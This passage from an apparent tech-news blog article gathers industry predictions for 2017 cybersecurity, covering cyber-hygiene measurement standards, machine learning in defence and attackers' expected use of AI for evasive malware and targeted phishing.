BAE also calls for the private and public sectors to work together towards a measurement standard for cyber hygiene. "Just as we have agreed measurement standards for the health of the economy or vital services like education, we predict 2017 will see cyber hygiene unprecedentedly measured in a standardised way to remind businesses and nations of their responsibilities for personal data. What that measurement looks like is a question industry, government and the wider business community must work out together," he said.
What cognitive computing can do for cybersecurity
Vendors will increasingly incorporate machine learning and artificial intelligence (AI) into security solutions as the technologies come of age.
“Machine learning is poised to be a crucial element in battling known and unknown ransomware threats and exploit kit attacks, among others,” Trend Micro's Siah predicted. “Machine learning is deployed through a layered system with human- and computer-provided inputs running through mathematical algorithms. This model is then pitted against network traffic, allowing a machine to make quick and accurate decisions about whether the network content—files and behaviours—are malicious or not.”
Source: Juniper Networks. Shi.
Source: Ixia. Bhat.
But Aurora of Darktrace points out it will work both ways, with AI also being used by attackers to “wield highly sophisticated and persistent attacks that blend into the noise of busy networks”. “We have already seen the first glimpses of these types of attack. Polymorphic malware, which changes its attributes mid-attack to evade detection, has reinforced the obsolescence of signature-based detection methods. What is emerging is a next generation of attacks that use AI-powered, customised code to emulate the behaviours of specific users so accurately as to fool even skilled security personnel,” he said.
“In 2017, we can expect AI to be applied to all stages of a cyber-attacker’s mission. This includes the ability to craft sophisticated and bespoke phishing campaigns that will successfully dupe even the most threat-conscious employee. (2017's) attacker can see more than your social media profile – they know that your 10am meeting with your supplier is being held at their new headquarters. At 9:15am, as you get off the train, an email with the subject line Directions to Our Office arrives in your inbox, apparently from the person that you are meeting. Now, do you click the map link in that email?”
Interested?
Read the related TechTrade Asia blog posts on IoT security in 2017 and on the problem of data integrity
Kaspersky Lab named ransomware its security story of the year for 2016 is a related blog post, as is McAfee Labs' 2017 threat predictions
Read the TechTrade Asia blog post about security becoming an availability issue for data centres
Check out the TechTrade Asia blog posts about the APJ findings for the CA Technologies security survey and ESET's report of a Linux ransomware scam
*Data travels through different networks, hardware and software to get to a destination. This refers to a 'middleman' at the browser software stealing the data, or affecting it in some way.
^Yara is a language which has been found to be particularly useful for creating detection tools.